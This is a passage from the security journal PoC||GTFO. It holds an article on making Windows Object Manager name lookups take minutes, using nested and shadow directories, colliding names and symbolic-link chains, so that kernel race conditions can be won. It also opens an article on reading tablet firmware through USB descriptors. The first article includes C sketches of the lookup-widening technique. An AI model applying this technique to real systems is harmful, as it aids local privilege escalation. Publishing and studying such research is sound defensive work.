PoC or GTFO, Volume 2



  13:3 How Slow Can You Go?

  by James Forshaw

  While researching Windows, I tend to find quite a few race condition vulnerabilities. Although these vulnerabilities can be exploited, you typically only get a tiny window of time in which to do it. The bug generally consists of the kernel first performing a security check, then accessing a resource, and then performing an action based on that check.

  In exploitable cases the race is between the security check and the action. If we can modify the state of the system in between those actions, it might be possible to elevate privileges or do unexpected things. The time window is typically very small, but if the code is accessing some controllable resource in between the check and the action, we might still be able to create a very reliable exploit.
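  As an illustrative sketch of the pattern (hypothetical kernel-style pseudocode; CheckAccess, OpenResource, and PerformPrivilegedAction are placeholders, not real APIs):

      // Hypothetical check-then-act pattern.
      NTSTATUS DoAction(PUNICODE_STRING Path) {
        if (!NT_SUCCESS(CheckAccess(Path)))       // 1. security check
          return STATUS_ACCESS_DENIED;
        HANDLE Handle = OpenResource(Path);       // 2. lookup of a resource
                                                  //    the attacker controls
        return PerformPrivilegedAction(Handle);   // 3. the action
      }

  If an attacker can change what Path refers to between steps 1 and 3, the privileged action is applied to a resource that was never checked; the longer step 2 takes, the easier that swap becomes.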

  I wanted to find a way of increasing the time window to win the race in cases where the code accesses a resource we control. The following is an overview of the thought process I went through to come up with a working solution.

  Object Manager Lookup Performance

  Hidden under the hood of Windows NT is the Object Manager Namespace (OMN). You wouldn’t typically interact with it directly, as the Win32 API for the most part hides it away. The NT kernel defines a set of objects, such as Files, Events, and Registry Keys, that can all have a name associated with them. The OMN provides the means to look up these named objects. It acts like a file system; for example, you can specify a path to an NT system call such as \BaseNamedObjects\MyEvent, and an event can thus be looked up.

  There are two special object types in the OMN, Object Directories and Symbolic Links. Object Directories act as named containers for other objects, whereas Symbolic Links allow a name to be redirected to another OMN path. Symbolic Links are used quite a lot; for example, the Windows drive letters are really symbolic links to the real storage device. When we call an NT system call, the kernel must lookup the entire path, following any symbolic links until it either reaches the named object or fails to find a match.

  For our exploit, we want to make the process of looking up a resource we control as slow as possible. For example, if we could make it take one or two seconds, then we’ve got a massive window of opportunity to win the race condition. Therefore, I want to find a way of manipulating the Object Manager lookup process to achieve this goal. I am going to present my approach to achieving the required result.

  A note about my setup: for my testing I am going to open a named Event object. All testing is done on my 2.8GHz Xeon workstation. Although it has twenty physical cores, the lookup process won’t be parallelized, and therefore that shouldn’t be an issue. Xeons tend to have more L2/L3 cache than consumer processors, but if anything this should only make our timings faster. If I can get a long lookup time on my workstation, it should be possible on pretty much anything else running Windows. This was all tested on an up-to-date Windows 10 machine; however, not much has changed since Windows 7 that might affect the results.

  First let’s just measure the time it takes to do a normal lookup. We’ll repeat the lookup a thousand times and take the average. The results are probably what we’d expect: the lookup process for a simple named Event is roughly 3μs. That includes the system call transition, lookup process, and the access check on the Event object. Although in theory you could win a race, it seems pretty unlikely, even on a multi-core processor. So let’s think about a way of improving the lookup time. (And when I say “improve,” I mean making the lookup time slower.)
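  A minimal timing harness might look like the following sketch, in which NtOpenEvent is resolved from ntdll and the event \BaseNamedObjects\MyEvent is assumed to have been created beforehand.

      #include <windows.h>
      #include <winternl.h>

      #ifndef NT_SUCCESS
      #define NT_SUCCESS(s) ((NTSTATUS)(s) >= 0)
      #endif
      #ifndef OBJ_CASE_INSENSITIVE
      #define OBJ_CASE_INSENSITIVE 0x00000040
      #endif

      typedef NTSTATUS (NTAPI *NtOpenEvent_t)(PHANDLE, ACCESS_MASK,
                                              POBJECT_ATTRIBUTES);

      // Returns the average lookup time in microseconds over 1,000 opens.
      double TimeLookup(PUNICODE_STRING name) {
        NtOpenEvent_t NtOpenEvent = (NtOpenEvent_t)GetProcAddress(
            GetModuleHandleW(L"ntdll"), "NtOpenEvent");
        OBJECT_ATTRIBUTES oa;
        InitializeObjectAttributes(&oa, name, OBJ_CASE_INSENSITIVE,
                                   NULL, NULL);
        LARGE_INTEGER freq, start, end;
        QueryPerformanceFrequency(&freq);
        QueryPerformanceCounter(&start);
        for (int i = 0; i < 1000; ++i) {
          HANDLE h;
          if (NT_SUCCESS(NtOpenEvent(&h, EVENT_ALL_ACCESS, &oa)))
            CloseHandle(h);
        }
        QueryPerformanceCounter(&end);
        return (end.QuadPart - start.QuadPart) * 1e6 /
               (double)freq.QuadPart / 1000.0;
      }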

  An Object Manager path is limited to the maximum string size afforded by the UNICODE_STRING structure.
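  For reference, the structure, as defined in the Windows headers, is:

      typedef struct _UNICODE_STRING {
        USHORT Length;         // current length in bytes, not characters
        USHORT MaximumLength;  // allocated size of Buffer, in bytes
        PWSTR  Buffer;         // UTF-16 data, not necessarily NUL-terminated
      } UNICODE_STRING;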

  We can see that the Length member is an unsigned 16-bit integer, limiting the maximum length to 2¹⁶ − 1. This, however, is a byte count, so in fact we are limited to half that many characters. From this result, there are two obvious possible approaches we can take:

  Make a path that contains one very long name. The lookup process would have to compare the entire name using a typical string comparison operation to verify it’s accessing the correct object. This should take linear time relative to the length of the string.

  Make multiple small, named directories nested within each other, e.g., \A\A\A\A\...\EventName. The assumption here is that each directory lookup takes a fixed amount of time to complete. This operation will again take time linear in the nesting depth of the directories.

  Now, it would seem likely that the cost of a full directory lookup will be worse than that of a string comparison, a primitive that is typically optimized quite heavily. At this point we have not had to look at any actual kernel code, and we won’t start quite yet; instead, empirical testing seems the way to go.

  Let’s start with the first approach, making a long string and performing a lookup on it. Our name limit is around 32,767 characters, although we’ll need to be able to make the object in a writable directory such as \BaseNamedObjects, which reduces the usable length slightly, but not enough to make a significant impact. Therefore, we’ll perform the Event opening on names between one and 32,000 characters in length.

  Although this is a little noisy, our assumption of linear lookup time seems correct. The longer the string, the longer it takes to look it up. For a 32,000-character string, this seems to top out at roughly 90μs. That’s not enough to be useful, but it’s certainly a start.

  Now let’s instead look at the recursive directory approach. In this case the upper bound is around 16,000 directories, because each path component must contain a backslash and a single-character name (i.e., \A\A\A\...), so our maximum directory depth is half the maximum character count. Of course, we’d assume that going through the full lookup process is going to take longer than comparing four Unicode characters, but let’s test to make sure. The results are shown on page 650.

  Well, I think that’s unequivocal. At a recursion depth of 16,000, the average lookup time is around 3,700μs, forty times longer than the long-path-name result. Now, of course, this comes with downsides. For a start, you need to create thousands of directory objects in the kernel. At least on a modern 64-bit Windows this isn’t likely to be too taxing; however, it’s still worth bearing in mind. Also, the process must maintain a handle to each of those directories, because otherwise they’d be deleted, as a normal user cannot make kernel objects permanent. Fortunately, the handle limit for a single process is on the order of 16 million.
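  Creating the nested directories is straightforward with the native API. A sketch follows; NtCreateDirectoryObject is exported by ntdll but undocumented, so its prototype is declared by hand, and OpenBaseNamedObjects is an assumed helper that returns a handle to \BaseNamedObjects.

      NTSTATUS NTAPI NtCreateDirectoryObject(PHANDLE, ACCESS_MASK,
                                             POBJECT_ATTRIBUTES);

      // Build \BaseNamedObjects\A\A\...\A, 16,000 levels deep, keeping
      // every handle open so the directories are not reclaimed.
      HANDLE dirs[16000];
      HANDLE parent = OpenBaseNamedObjects();
      UNICODE_STRING name;
      RtlInitUnicodeString(&name, L"A");
      for (int i = 0; i < 16000; ++i) {
        OBJECT_ATTRIBUTES oa;
        InitializeObjectAttributes(&oa, &name, OBJ_CASE_INSENSITIVE,
                                   parent, NULL);  // relative to parent
        NtCreateDirectoryObject(&dirs[i], MAXIMUM_ALLOWED, &oa);
        parent = dirs[i];
      }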

  Now, will 3,700μs be enough for us? It’s certainly orders of magnitude greater than 3μs, but can we do better? We’ve now run out of path space; we’ve filled the absolute maximum allowed string length with recursive directory names. What we want is a method of multiplying that effect without requiring a longer path. We can do this by using Object Manager symbolic links. By placing a symbolic link as the last component of the long path, we can force the kernel to reparse and start the lookup all over again. On the final lookup we’ll just point the symbolic link at the target.

  Ultimately, though, we can only do this 64 times, and we can’t do it indefinitely for a fairly obvious reason: each time a symbolic link is encountered, the kernel restarts the parsing process, so a symbolic link pointed at itself would produce an infinite loop, were it not for the reparse limit of 64. The results are as we expected: the time taken to look up our event is proportional to both the number of symbolic links and the number of recursive directories. For 64 symbolic links and 16,000 directories it takes approximately 200ms. At around a fifth of a second, that should be enough, but I’m greedy. How can we make the lookup time even worse?
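  A sketch of the chaining; NtCreateSymbolicLinkObject is likewise undocumented, so its prototype is declared by hand, baseDir is an assumed handle to a writable directory, and MakeLinkName and BuildDeepPath are assumed helpers that produce the name "linkN" and the maximum-length \A\A\...\A\linkN path respectively.

      NTSTATUS NTAPI NtCreateSymbolicLinkObject(PHANDLE, ACCESS_MASK,
                                                POBJECT_ATTRIBUTES,
                                                PUNICODE_STRING);

      // link0 points at the real event; each subsequent link points at a
      // maximum-length deep path ending in the previous link, so every
      // reparse restarts the full directory walk.
      HANDLE links[64];
      for (int i = 0; i < 64; ++i) {
        UNICODE_STRING linkName, target;
        MakeLinkName(&linkName, i);
        if (i == 0)
          RtlInitUnicodeString(&target,
                               L"\\BaseNamedObjects\\MyEvent");
        else
          BuildDeepPath(&target, i - 1);
        OBJECT_ATTRIBUTES oa;
        InitializeObjectAttributes(&oa, &linkName, OBJ_CASE_INSENSITIVE,
                                   baseDir, NULL);
        NtCreateSymbolicLinkObject(&links[i], MAXIMUM_ALLOWED, &oa,
                                   &target);
      }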

  At this point it’s time to break out the disassembler and see how the lookup process works under the hood in the kernel. First off, let’s see what an object directory structure looks like. We can dump it from a kernel debugging session using WinDBG with the command dt nt!_OBJECT_DIRECTORY. Converted back to a C-style structure, it looks something like this.
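  Reconstructed from public symbols, it is roughly the following; the exact members vary between Windows builds, so treat this as a sketch.

      struct OBJECT_DIRECTORY {
        struct OBJECT_DIRECTORY_ENTRY *HashBuckets[37];
        EX_PUSH_LOCK Lock;
        struct DEVICE_MAP *DeviceMap;
        ULONG SessionId;
        PVOID NamespaceEntry;
        ULONG Flags;
      };

      struct OBJECT_DIRECTORY_ENTRY {
        struct OBJECT_DIRECTORY_ENTRY *ChainLink;  // next entry in bucket
        PVOID Object;
        ULONG HashValue;  // cached hash of the entry's name
      };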

  Based on the presence of the HashBuckets field, it’s safe to assume that the kernel is using a hash table to store directory entries. This makes some sense: if the kernel just maintained a flat list of directory entries, lookup performance would be pretty poor. With a hash table, the lookup time is much reduced, as long as the hashing algorithm does a good job of reducing collisions. As we’re trying to increase the cost of lookups, we can intentionally add colliding entries to force the lookup into its worst case, which takes time linear in the number of entries in the directory. This provides us with another scaling factor, and in this case the number of entries is limited only by available memory, as we never need to put these names into the lookup path itself.

  So what’s the algorithm for the hash? The main function of interest is ObpLookupObjectName, which is referenced by functions such as ObReferenceObjectByName. The directory entry logic is buried somewhere in this large function; fortunately, however, there’s a helper function, ObpLookupDirectoryEntryEx, which contains the same logic in a smaller and easier-to-reverse form. (Figure 13.9.)

  So the hashing algorithm is pretty simple; it repeatedly mixes the bits of the current hash value and then adds the uppercase Unicode character to the hash. We could work out a clever way of getting hash collisions from this, but actually it’s pretty simple: the Object Manager allows us to specify names containing NUL characters, so if we take our target name, say ‘A’, and prefix it with successively longer strings consisting only of NULs, we get both hash and bucket collisions. This limits us to creating only 32,000 or so colliding entries before we run out of distinct names, but, as we’ll see in a minute, that’s not a problem. Let’s look at the results of doing this for a single directory.
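  (Building these names takes a little care in practice: routines like RtlInitUnicodeString stop at the first NUL, so the UNICODE_STRING has to be filled in by hand. A sketch:)

      // Name i is L"\0\0...\0A" with i leading NUL characters. Leading
      // NULs leave the running hash at zero, so every such name hashes
      // exactly like "A" and lands in the same bucket.
      void MakeCollidingName(UNICODE_STRING *name, WCHAR *buf, int nuls) {
        for (int j = 0; j < nuls; ++j)
          buf[j] = L'\0';
        buf[nuls] = L'A';
        name->Buffer = buf;
        name->Length = (USHORT)((nuls + 1) * sizeof(WCHAR));
        name->MaximumLength = name->Length;
      }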

  Figure 13.9: ObpLookupDirectoryEntryEx()
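  Its core loop is commonly rendered in public reversing write-ups as something like the following; the constants and the 37-bucket count are taken from those write-ups, so treat them as assumptions.

      // Per-character update: mix the current hash, then add the upcased
      // UTF-16 character; the final value selects one of 37 buckets.
      ULONG HashValue = 0;
      for (ULONG i = 0; i < Name->Length / sizeof(WCHAR); ++i) {
        HashValue = (HashValue / 2) + 9 * HashValue;
        HashValue += RtlUpcaseUnicodeChar(Name->Buffer[i]);
      }
      ULONG Bucket = HashValue % 37;
      // While HashValue is zero, a NUL character contributes nothing,
      // which is what makes the leading-NUL collision trick work.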

  Yet again, a nice linear graph. For a given count, collisions are nowhere near as effective as the recursive directory approach, but they are a multiplicative factor in the lookup time, which we can abuse. So you’d think we could now easily apply this to all 16,000 recursive directories, add in the symbolic links, and get an insane lookup time. We could, but there’s a problem: insertion time. Every time we add a new entry to a directory, the kernel must do a lookup to check that the entry doesn’t already exist. Inserting the k-th colliding entry therefore scans the k − 1 entries already in the bucket, so building a directory of n colliding entries costs about n(n − 1)/2 comparisons in total; the setup time grows with the square of the number of entries. Sure, it’s not a cubic or exponential increase, but that’s hardly a consolation. To prove that this is the case, we can just measure the insertion time.

  That graph shows a pretty clear n² trend in the insertion time. If, say, we wanted to create a directory entry with 16,000 collisions, it takes almost six seconds. If we wanted to then do that for all 16,000 recursive directories, it would take an entire day! Now, I think we’re going a bit over the top here, but by fiddling with the values we can get something that doesn’t take too long to set up and still gives us a long lookup time. I’m still greedy, though; I want to see how far I can push the lookup time. Is there any way we can get the best of all worlds?

  The final piece of the puzzle is to bring in Shadow directories, which give the Object Manager a fallback path if it can’t find an entry in a directory. You can use almost any other Object Manager directory as a shadow, which allows us to control the lookup behavior. Shadow directories have a crucial difference from symbolic links: they don’t cause a reparse during the lookup process, so they’re not subject to the 64-reparse limit. As each lookup still consumes a path component, eventually there will be no more components to look up. By putting together just two directories, we can pass a path similar to our recursive directory lookup without actually creating all the directories.

  So how does this actually work? If we open a path of the form \A\A\A\A\A..., the kernel will first look up the initial ‘A’ directory. This is the directory on the left of the diagram. It will then try to open the next ‘A’ directory, the one on the right, which again it will find. Next the kernel again looks up ‘A’, but in this case it doesn’t exist in the right-hand directory. As that directory has a shadow link to its parent, it looks there instead, finds the same ‘A’ directory, and repeats the process. This will continue until we run out of path elements to look up.
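  Shadow directories are created with NtCreateDirectoryObjectEx, an undocumented variant of NtCreateDirectoryObject that takes a shadow-directory handle; the prototype below is declared by hand from public reversing notes, so treat it as an assumption (baseDir is again an assumed writable-directory handle).

      NTSTATUS NTAPI NtCreateDirectoryObjectEx(PHANDLE, ACCESS_MASK,
                                               POBJECT_ATTRIBUTES,
                                               HANDLE ShadowDirectory,
                                               ULONG Flags);

      // Left-hand directory A, then a child A inside it whose shadow is
      // the left-hand directory. A lookup of \A\A\A\... then bounces
      // between the two until the path is exhausted.
      HANDLE left, right;
      UNICODE_STRING name;
      RtlInitUnicodeString(&name, L"A");
      OBJECT_ATTRIBUTES oa;
      InitializeObjectAttributes(&oa, &name, OBJ_CASE_INSENSITIVE,
                                 baseDir, NULL);
      NtCreateDirectoryObject(&left, MAXIMUM_ALLOWED, &oa);
      InitializeObjectAttributes(&oa, &name, OBJ_CASE_INSENSITIVE,
                                 left, NULL);
      NtCreateDirectoryObjectEx(&right, MAXIMUM_ALLOWED, &oa, left, 0);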

  So let’s determine the performance of this approach. We’d perhaps expect it to be somewhat less effective than actually creating all those directories, if only because just two directories will sit warm in the processor’s caches. Hopefully it won’t be too far behind.

  Looks good. Yes, the achieved lookup time is lower than with the real directories, but once we bring collisions into the mix, that’s not really going to matter much. So the final result is that instead of creating 16,000 directories with 16,000 collisions each, we can do it with just two directories, which is far more manageable and takes just eleven seconds to set up on my workstation. So, to sign off, let’s combine everything together:

  16,000 path components using two object directories in a shadow configuration.

  16,000 collisions per directory.

  64 symbolic link reparsings.
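  Combining those three ingredients, the path handed to the final open might be assembled as in this sketch; the link63 name follows the earlier symbolic-link sketch and is an assumption, and the result still has to be wrapped in a UNICODE_STRING by hand, since Length is a byte count.

      #include <wchar.h>

      // \BaseNamedObjects\A enters the shadowed pair; 16,000 \A components
      // bounce between the two directories; the final component is the top
      // of the 64-deep symbolic link chain, which restarts the whole walk.
      wchar_t path[65536];
      wchar_t *p = path + swprintf(path, 64, L"\\BaseNamedObjects\\A");
      for (int i = 0; i < 16000; ++i) {
        *p++ = L'\\';
        *p++ = L'A';
      }
      swprintf(p, 64, L"\\link63");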

  And the resulting time for a single lookup on my workstation is nearly twenty minutes! I think we might just be able to win the race condition with that. Code examples can be found attached to this document.

  After all that effort, we can make the kernel take nineteen minutes to look up a single controlled resource path. That’s pretty impressive. We have many options for getting the kernel to start the lookup process, allowing us to use not just files and registry keys but almost any named object. It’s a typical tale of unexpected behavior when facing pathological input, and it’s not really surprising that Microsoft wouldn’t optimize for this use case.

  13:4 A USB Glitching Attack; or, Reading RFID by ROP and Wacom

  by Micah Elizabeth Scott

  Greetings, neighbors!

  Today, like most days, I would like to celebrate the diversity of tiny machines around us. This time I’ve prepared a USB magic trick of sorts, incorporating techniques from the analog and the digital domains.

  Regular readers will be well aware that computer peripherals are typically general-purpose computers themselves, and the operating system often trusts them a little too much. Devices attached to Thunderbolt (PCI Express) are trusted as much as the CPU. Devices attached to USB, at best, are as privileged as the user, who can typically do anything they want, albeit slowly and using interfaces designed for meat. If that USB device can exploit a bug in literally any available driver, the device could achieve even more direct levels of control.

  Not only are these peripherals small computers with storage and vulnerabilities and secrets, they typically have very direct access to their own hardware. It’s often firmware’s responsibility to set up clocks, program power converters, and process analog signals. Projects like BadUSB have focused on reprogramming a USB device to attack the computer they’re attached to. What about using the available low-level peripherals in ways they weren’t intended?

  I recently made a video, a “Graphics Tablet Primer for Hackers,” going into some detail on how a pen tablet input device actually works. I compared the electromagnetic power and data transfer to the low-frequency RFID cards still used by many door access control systems. At the time this was just a convenient didactic tool, but it did start me wondering just how hard it would be to use a graphics tablet to read 125 kHz RFID cards.

  I had somewhat arbitrarily chosen a Wacom CTE-450 (Bamboo Fun) tablet for this experiment. I had one handy, and I’d already done a little preliminary reversing on its protocol and circuit design. It’s old enough that it didn’t seem to use any custom Wacom silicon, recent enough to be both cheap and plentiful on the second-hand market.

  A Very Descriptive Descriptor

  Typically you need firmware to analyze a device. Documented interfaces are the tip of the iceberg. To really see what a device is capable of, you need to see everything the firmware knows how to do. Sometimes this is easy to get. Back in PoC‖GTFO 7:3, when I was reversing an optical drive, the firmware was plainly available from the manufacturer’s web site. Usually you won’t be so lucky. Manufacturers often encrypt firmware to hide their crimes or slow down clones, and some devices don’t appear to support firmware updates at all.

  This device seemed to be the latter kind. No firmware updates online. No hints of a firmware updating process hidden in its drivers. The CPU was something I didn’t recognize at first. I posted the photo to Twitter, and Lady Ada recognized it as a Sanyo/ONsemi LC87, an 8-bit micro that seems to be mostly used in Japanese consumer electronics. It comes in both flash and ROM versions, both of which I would later find in these tablets. Test points were available for an on-chip debugger, but I couldn’t find the debug adapter for sale anywhere, nor could I find any documentation for the protocol. I even found the firmware for this mysterious TCB87-TypeC debug adapter, and a way to disassemble it, but the actual debug port was implemented by a custom peripheral on the adapter’s CPU. I tried various bit twiddling and pulse pushing in hopes of getting a response from the debug port, but my best guess is that it’s been disabled.

  At this point, the remaining options are more direct. A sufficiently funded and motivated researcher could certainly break out the micropositioners and acid, reading the data directly from on-chip busses. But this is needlessly complex and expensive. This is a USB device after all, and we have a perfectly good off-chip bus that can already do many things. In fact, when you attach a USB device to your PC, it typically hands very small pieces of its firmware back to the PC in order to identify itself. We think of these USB Descriptors as data tables, not part of the firmware at all, but where else would they be stored? On an embedded device where RAM is so precious, the descriptor chunks will be copied directly from Flash or Mask ROM into the USB endpoint buffer. It’s a tiny engine designed to read parts of firmware out over USB, and nearly every USB device has code like this.
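  As a concrete illustration, with libusb you can pull those descriptor chunks, bytes the firmware serves up from its own flash or mask ROM, out of any attached device. A sketch; the product ID here is a placeholder.

      #include <libusb-1.0/libusb.h>
      #include <stdio.h>

      int main(void) {
        libusb_context *ctx;
        libusb_init(&ctx);
        // 0x056a is Wacom's vendor ID; the product ID is a placeholder.
        libusb_device_handle *h =
            libusb_open_device_with_vid_pid(ctx, 0x056a, 0x0000);
        if (!h) return 1;
        unsigned char buf[256];
        // Standard GET_DESCRIPTOR request for the device descriptor: the
        // same little engine that reads firmware bytes out over USB.
        int n = libusb_control_transfer(h,
            LIBUSB_ENDPOINT_IN | LIBUSB_REQUEST_TYPE_STANDARD |
                LIBUSB_RECIPIENT_DEVICE,
            LIBUSB_REQUEST_GET_DESCRIPTOR,
            (LIBUSB_DT_DEVICE << 8) | 0, 0, buf, sizeof(buf), 1000);
        for (int i = 0; i < n; ++i)
          printf("%02x ", buf[i]);
        printf("\n");
        libusb_close(h);
        libusb_exit(ctx);
        return 0;
      }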

 
